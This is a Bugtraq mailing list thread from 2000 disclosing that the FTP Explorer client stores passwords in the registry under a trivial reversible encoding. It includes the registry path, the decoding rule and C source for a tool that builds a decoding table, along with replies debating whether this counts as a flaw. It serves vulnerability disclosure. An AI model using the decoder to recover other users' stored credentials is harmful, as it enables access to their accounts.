Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: How the password could be recover using FTP Explorer's registry!
From: rishi () UDEL EDU (Rishi Lee Khan)
Date: Mon, 28 Feb 2000 01:30:19 -0500


I've notice the similar behavior, and in fact, I've used it to decyrpt
passwords I've forgotten. However, I DO think that it is a security hole
that when you uninstall this software, it does NOT delete the registry
entries. Therefore, if one installs FTP Explorer on a machine that
previously had it installed, all of the old passwords and accounts are
still there. So you can log into someone else's stuff. This is especially
a concern here at the University of Delaware as many people install and
remove shareware from public computing sites.

                -Rishi

On Fri, 25 Feb 2000, Seth R Arnold wrote:

Nelson, excuse my asking, but .. is this not the expected behavior?

Any client that stores login/password information must store it in a
plain-text equivalent form on the hard drive, *unless it prompts the
user for a key with which to unlock the information*. Unless it uses a
key supplied by the user, it must be based on something similar to this.

If FTP Explorer is actually a server, then this is insecure -- servers
should store hashes of passwords, not passwords. If FTP Explorer is an
ftp client, one would hope it documents the storing of passwords; to my
way of thinking, not prompting for passwords the next time a site is
used is documentation enough for anyone that cares about their security.
Anyone for whom this isn't enough likely doesn't care about their
security.

If you are worried about other people on your machine getting at the
password through the registry, then I would hope the security settings
on the registry are setup to disallow access -- but that would be WinNT
only.

Don't get me wrong -- this is good detective work. However, to my way of
thinking, this is also expected behavior.

Flames welcome. Autoreplies "I am out of the office" are not. :)

On Thu, Feb 24, 2000 at 09:18:52PM -0300, Nelson wrote:
The scene:
user -> nelson
pass -> ABC

ON Connect Window, typed login == nelson and pass == ***(ABC), made a
connection in my own ftp server. After this, I found this KEY in Windows
REGISTRY:
HKEY_CURRENT_USER -> Software -> FTP Explorer -> Profiles -> MY_OWN_SERVER

and I found two values:
Login = nelson
Type  = 4A4E52

Hmmm... looks like a encrypted password  to me...

Ok, the crypt function in FTP Explorer works like that:
get the ascii hexa value and increment 9, if the position in password was
changed, increment 3 per position.

IN order words, a progression arithmetical.

I made a code to proof this, look the result:
unreal:~/temp$ ./ftpe-crypt -t 3 -i 9 -r 3 -s teste
Criptografia do FTP Explorer v0.6b - por Nelson Brito
unreal:~/temp$ more teste
[...]
A = 4A = 4D = 50
    `-> correct
B = 4B = 4E = 51
         `-> correct
C = 4C = 4F = 52
              `-> correct
[...]

Well, the password is 'ABC'... Is it a big security hole? I think so...

PS: The credits to begin this thread in BOS-Br<bos () sekure org> goes to
Hever<Hever () vitech net>.

PPS: Sorry about my poor ENGLISH. If don't understand, don't read. =)

My proof...

-------begin
/*
 ** Este  codigo  demostra  como  funciona  a "criptografia" do software FTP
 ** Explorer,  levando-se  em  consideracao  as informacoes  passadas para a
 ** BOS-Br por Hever<Hever () vitech net>.
 **
 ** author:  Nelson Brito
 ** e-mails: nelson () sekure org & nelson () secunet com br
 ** program: ftpe-crypt.c
 **
 ** ChangeLog:
 ** v 0.6b - arquivo de destino incluido(output file)
 **        - apartir desta versao sera' necessario a utilizacao de todos os
 **          argumentos na linha de comando
 ** v 0.5b - incluido opcoes longas na linha de comando
 **        - problemas da opcao '-h' corrigidos gracas a fpm :*( ) )
 ** v 0.4  - opcoes  de  linha  de comando  acrescentadas,  permitindo que o
 **          usuario "set" suas preferencias [a.k.a. getopt(3)]
 ** v 0.3  - adicionado argumentos passados para a funcao r2()
 **        - contador a ser usado em r2() como argumento
 ** v 0.2  - desenvolvimento das funcao r2() e inclusao de u_abort()) e
 **          logo()
 **        - o length do password foi aumentado
 ** v 0.1  - desenvolvimento inicial do esqueleto do programa, incluindo:
 **          > retirada dos caracteres especiais, ie, so' [a-z][A-Z][0-9]
 **          > uma simples PA, sem utilizacao de formula ou funcao
 **
 ** Agradecimentos a drk, Morauder e fpm pela forca com o getopt(3). =)
 **
 ** Como compilar(How to compile):
 ** lameness:~# gcc -Wall -O3 -g ftpe-crypt.c -o ftpe-crypt
 */

#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <getopt.h>
#include <unistd.h>
#define  VERSION   "0.6b"

int r2(int n, int p, int i, int b, FILE *fp){
      n=((n+b)+(i*p));
      fprintf(fp, "= %X ", n);
      return(n);
}

char usage(char *p){
      fprintf(stderr, "use:     %s -l <length> -i <increment> -r <ratio> -o <output-file>\n", p);
      fprintf(stderr, "example: %s -l 15 -i 9 -r 3 -o outlist\n", p);
      fprintf(stderr, "options:\n\t -l, --length     password's length\n");
      fprintf(stderr, "\t -i, --increment  ASCII Table's increment\n");
      fprintf(stderr, "\t -r, --ratio      PA's ratio\n");
      fprintf(stderr, "\t -o, --output     output file\n");
      fprintf(stderr, "\nfor ftpe's criptography use r=3, i=9\n");
      exit(0);
}

int main(int ac, char **av){
   FILE *outlist = NULL;

   register int a = 48;
   int r = 0, inc = 0, ct = 0, op;

   printf("FTP Explorer's Criptography v%s - by Nelson Brito\n", VERSION);

   if(ac != 9) usage(av[0]);

   while(1){
        static struct option long_options[] = {
           {"length",        1, 0, 'l'},
           {"ratio",         1, 0, 'r'},
           {"increment",     1, 0, 'i'},
           {"output",        1, 0, 'o'},
           {0,               0, 0, 0}
        };

        int option_index = 0;
        op = getopt_long(ac, av, "l:r:i:o:", long_options, &option_index);

        if (op == -1) break;

        switch(op){
              case 'l':
                    ct = atoi(optarg);
                    break;
              case 'r':
                    r = atoi(optarg);
                    break;
              case 'i':
                    inc = atoi(optarg);
                    break;
             case 'o':
                    if(!(outlist=fopen(optarg, "w"))){
                       printf("unable to open %s\n", optarg);
                       exit(0);
                    }
                    break;
              default:
                    usage(av[0]);
                    break;
        }
   }

   while(a < 123){

        if((a >= 58) && (a <= 64)){
             printf("%c", (char)0);
             a++;
        }

        else if((a >= 91) && (a <= 96)){
             printf("%c", (char)0);
             a++;
        }

        else{
              register int c;

              fprintf(outlist, "%c ", (char)a);
              for(c = 0 ; c < ct ; c++) r2(a, c, r, inc, outlist);
              fprintf(outlist, "\n");
              a++;
        }

   }

   fclose(outlist);

   return(1);
}
-------end

Sem mais,
--
Nelson - nb

--
Seth Arnold | http://www.willamette.edu/~sarnold/
Hate spam? See http://maps.vix.com/rbl/ for help
Hi! I'm a .signature virus! Copy me into
your ~/.signature to help me spread!



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault